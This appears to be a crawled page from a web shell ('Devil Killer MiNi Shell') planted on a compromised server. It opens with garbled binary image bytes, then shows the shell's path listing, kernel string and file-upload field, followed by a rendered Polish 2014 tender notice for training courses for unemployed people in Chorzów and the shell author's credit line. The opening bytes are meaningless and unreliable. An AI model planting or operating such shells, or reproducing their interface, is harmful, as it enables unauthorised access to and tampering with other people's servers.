JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140813/175245-N-2014.html

<p class="kh_header"><b>Chorzów: Szkolenia dla osób bezrobotnych współfinansowane ze środków Europejskiego Funduszu Społecznego 6.1.3/III/2014</b><br>
<b>Numer ogłoszenia: 175245 - 2014; data zamieszczenia: 13.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Opolska 19, 41-500 Chorzów, woj. śląskie, tel. 032 3497101, faks 032 3497100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupchorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego - Powiatowy Urząd Pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia dla osób bezrobotnych współfinansowane ze środków Europejskiego Funduszu Społecznego 6.1.3/III/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkoleń dla osób bezrobotnych współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach projektu SZANSA DLA CIEBIE realizowanego w zakresie Poddziałania 6.1.3 Programu Operacyjnego Kapitał Ludzki 2007-2013 w następujących zakresach:
1. Kasjer-sprzedawca (13 osób w I edycji); 
2. Cukiernik-ciastkarz (6 osób w I edycji);
3. Podstawy obsługi komputera (13 osób w I edycji);
4. Pracownik magazynu z elementami logistyki i obsługą wózków jezdniowych (10 osób w I edycji).
Zajęcia muszą odbywać się od poniedziałku do piątku, nie więcej niż 8 godzin dziennie - między godziną 8.00 a 19.00. Zamawiający nie dopuszcza możliwości organizowania szkolenia w sobotę i niedzielę. W części II zamówienia tj. szkolenie cukiernik-ciastkarz dopuszcza się organizację zajęć w innych dniach i godzinach niż wskazane powyżej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (tj. Dz.U. z 2013r. poz. 674 z późniejszymi zmianami), tj. posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczenia wg. formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2 usługi szkoleniowe grup, w których co najmniej:
a) 6 osób ukończyło szkolenie obejmujące swym zakresem tematykę szkolenia z zakresu części 2: Cukiernik-ciastkarz.
b) 10 osób ukończyło szkolenie obejmujące swym zakresem tematykę szkolenia z zakresu części 1: Kasjer-sprzedawca; z zakresu części 3: Podstawy obsługi komputera; z zakresu części 4: Pracownik magazynu z elementami logistyki i obsługą wózków jezdniowych - oraz potwierdzą, że wykonali je należycie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia - należy wskazać jakie moduły zawiera.
Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczenia wg. formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy którzy wykażą, że dysponują lub będą dysponować minimum 2 osobami, które w okresie ostatnich 3 lat przed upływem terminu składania ofert przeprowadziły min. 2 szkolenia, którego zakres tematyczny odpowiada zagadnieniom, które wskazana osoba będzie omawiała na szkoleniu objętym przedmiotem zamówienia.
Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczenia wg. formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczenia wg. formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta cenowa - załącznik 1 do SIWZ;
Oświadczenie o braku podstaw do wykluczenia - załącznik 2 do SIWZ;
Oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik 3 do SIWZ;
Wykaz wykonanych usług szkoleniowych - załącznik 4 do SIWZ;
Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia - załącznik 5 do SIWZ;
Program szkolenia - załącznik 6 do SIWZ;
Preliminarz kursu - załącznik 7 do SIWZ;
Oświadczenie o powiązaniu kapitałowym - załącznik 9 do SIWZ;
Oświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy wojewódzki urząd pracy - załącznik 10 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 45</li>
<li>2 - Certyfikaty jakości usług posiadane przez instytucję szkoleniową - 15</li>
<li>3 - Doświadczenie instytucji szkoleniowej w realizacji szkoleń z obszaru zlecanego lub powierzanego szkolenia - 15</li>
<li>4 - Jakość oferowanego programu szkolenia - 15</li>
<li>5 - Dostosowanie kwalifikacji i doświadczenia kadry dydaktycznej do zakresu szkolenia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana strony umowy tj. następstwo prawne wynikające z odrębnych przepisów; zmiany ilości uczestników szkolenia, miejsca odbywania zajęć lub osoby prowadzącej zajęcia - będącej następstwem okoliczności, których nie można było przewidzieć; zmiana miejsca odbywania zajęć może nastąpić tylko w obrębie wcześniej wskazanych miejscowości (tak samo punktowanych w kryterium oceny: jakość oferowanego programu szkolenia - miejsce organizacji zajęć).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.chorzow.sisco.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Chorzowie, ul. Opolska 19; 41-500 Chorzów, pokój 1, parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2014 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Chorzowie, ul. Opolska 19; 41-500 Chorzów, pokój 13, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach projektu SZANSA DLA CIEBIE realizowanego w zakresie poddziałania 6.1.3 Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kasjer - sprzedawca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób: 13 osób w  I edycji
Czas realizacji: nie dłużej niż  4 tygodnie
Program szkolenia: minimalna liczba godzin: 100 w tym co najmniej 70 godzin zajęć praktycznych, z czego minimum 40 godzin praktyki zawodowej przeprowadzonej w placówkach handlowych na stanowisku kasjera-sprzedawcy.  

Program szkolenia musi zawierać co najmniej: 
- BHP, 
- ppoż,
- HACCP,
- obsługa kas fiskalnych, terminali kart płatniczych i innych urządzeń sklepowych,
- obsługa klienta,
- środki płatnicze,
- rozpoznawanie autentyczności polskich znaków pieniężnych,
- znaki pieniężne krajów Unii Gospodarczej i Walutowej,
- doładowanie telefonów komórkowych, kart podarunkowych,
- praktyka zawodowa w wymiarze co najmniej 40 godzin przeprowadzona w placówkach handlowych na stanowisku kasjera-sprzedawcy,
- przeprowadzenie badań w celu uzyskania przez uczestników szkolenia książeczki zdrowia dla celów sanitarno-epidemiologicznych. Wykonawca zobowiązany jest uwzględnić koszty badań lekarskich w preliminarzu kosztów szkolenia oraz wydać uczestnikom szkolenia skierowania na powyższe badania w ciągu dwóch dni od rozpoczęcia szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cukiernik - ciastkarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób: 6 osób w  I edycji
Czas realizacji: nie dłużej niż  8 tygodni
Program szkolenia: minimalna liczba godzin: 240 w tym co najmniej 160 godzin zajęć praktycznych, przeprowadzonych u zewnętrznego pracodawcy zapewniającego rzeczywiste warunki pracy właściwe dla nauczanego zawodu. 


Program szkolenia musi zawierać co najmniej: 
- BHP,
- ppoż.,
- pierwsza pomoc przedlekarska,
- HACCP,
- wyposażenie i organizacja stanowiska pracy,
- maszyny i urządzenia wykorzystywane w pracy,
- terminologia stosowana w cukiernictwie,
- prawidłowa obróbka wstępna i termiczna produktów spożywczych, bezpieczne przechowywanie dla zachowania ich walorów wzrokowych i smakowych,
- zasady racjonalnego doboru surowców i ich maksymalnego wykorzystania w kuchni,
- techniki rozpoznawania przydatności surowców do produkcji,
- surowce i materiały pomocnicze stosowane w cukiernictwie - sposoby doboru surowców do poszczególnych wyrobów,
- praktyczne zastosowanie procesów technologicznych cukiernictwie,
- rodzaje ciast (ciasta kruche i półkruche, ciasta ucierane, ciasta biszkoptowe, pierniki, pierniczki i keksy, serniki - sernik tradycyjny, sernik na zimno, ciasta drożdżowe, makowce, strudle, faworki i pączki, torty na bazie ciast biszkoptowych + dekoracje, beza i makaroniki + dodatki),
- produkcja i rodzaje lodów,
- przygotowanie i praca z karmelem,
- czekolada - techniki pracy z czekoladą, polewy i ozdoby czekoladowe,
- kremy, pianki, musy, mleczka oraz desery typu panna cotta,
- produkcja chałwy, sezamków,
- dekorowanie wyrobów cukierniczych i ciastkarskich, przygotowanie ich do dystrybucji,
- najnowsze trendy w wyrobach cukierniczych,
- ekspozycja i aranżacja,
- 160 godzin zajęć praktycznych przeprowadzonych u zewnętrznego pracodawcy zapewniającego rzeczywiste warunki pracy właściwe dla nauczanego zawodu,
- przeprowadzenie badań w celu uzyskania przez uczestników szkolenia książeczki zdrowia dla celów sanitarno-epidemiologicznych. Wykonawca zobowiązany jest uwzględnić koszty badań lekarskich w preliminarzu kosztów szkolenia oraz wydać uczestnikom szkolenia skierowania na powyższe badania w ciągu dwóch dni od rozpoczęcia szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podstawy obsługi komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób: 13 osób w  I edycji
Czas realizacji: nie dłużej niż  4 tygodnie
Program szkolenia: minimalna liczba godzin: 100 w tym co najmniej 70 godzin zajęć praktycznych. 

Program szkolenia musi zawierać co najmniej: 
- BHP, 
- ppoż.,
- podstawy budowy i obsługi komputera,
- urządzenia peryferyjne i sposoby ich podłączania,
- praca z nośnikami danych,
- obsługa systemu operacyjnego Windows,
- operacje na plikach i folderach,
- edytor tekstu (np. MS Word),
- arkusz kalkulacyjny (np. MS Excel),
- program do prezentacji (np. PowerPoint),
- bazy danych (np. MS Access),
- internet i poczta elektroniczna,
- bankowość elektroniczna,
- bezpieczne zakupy w sieci..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pracownik magazynu z elementami logistyki i obsługą wózków jezdniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób: 10 osób w I edycji
Czas realizacji: nie dłużej niż  8 tygodni
Program szkolenia: minimalna liczba godzin: 200 w tym co najmniej 125 godzin zajęć praktycznych, z czego  30 godzin praktyki zawodowej przeprowadzonej w hurtowniach lub magazynach. Zajęcia praktyczne w hurtowniach lub magazynach muszą polegać na wykonywaniu czynności związanych z obsługą wózków jezdniowych, z uwzględnieniem wózków jezdniowych wysokiego składowania i magazynowaniem towarów na wysokości powyżej 3m.  

Program szkolenia musi zawierać co najmniej: 
- BHP, 
- ppoż., 
- pomoc przedlekarska, 
- HACCP,
- przestrzeganie przepisów dotyczących ochrony środowiska,
- typy wózków jezdniowych, budowa i wyposażenie,
- czynności operatora przy obsłudze wózków,
- wymiana butli gazowych w wózkach,
- gospodarka magazynowa w przedsiębiorstwie produkcyjnym i handlowym,
- wiadomości z zakresu ładunkoznawstwa,
- towaroznawstwo,
- logistyka w magazynie,
- elementy zarządzania w magazynie,
- obsługa kas fiskalnych,
- praktyczna nauka jazdy wózkami z uwzględnieniem jazdy wózkami wysokiego składowania,
- obsługa programu komputerowego do fakturowania np. SUBIEKT I SYMFONIA,
- przeprowadzenie egzaminu przed komisją kwalifikacyjną Urzędu Dozoru Technicznego w celu uzyskania przez uczestników szkolenia zaświadczenia kwalifikacyjnego do obsługi urządzeń transportu bliskiego w kategorii II oraz I WJO,
- 30 godzin zajęć praktycznych przeprowadzonych w hurtowniach lub magazynach. Zajęcia praktyczne w hurtowniach lub magazynach muszą polegać na wykonywaniu czynności związanych z obsługą wózków jezdniowych, z uwzględnieniem wózków jezdniowych wysokiego składowania i magazynowaniem towarów na wysokości powyżej 3m,
- przeprowadzenie badań orzekających o zdolności do wykonywania przez uczestników szkolenia pracy na wysokości powyżej 3m. Wykonawca zobowiązany jest uwzględnić koszty badań lekarskich w preliminarzu kosztów szkolenia oraz przeprowadzić powyższe badania w ciągu dwóch dni od rozpoczęcia szkolenia.
- przeprowadzenie badań w celu uzyskania przez uczestników szkolenia książeczki zdrowia dla celów sanitarno-epidemiologicznych. Wykonawca zobowiązany jest uwzględnić koszty badań lekarskich w preliminarzu kosztów szkolenia oraz wydać uczestnikom szkolenia skierowania na powyższe badania w ciągu dwóch dni od rozpoczęcia szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com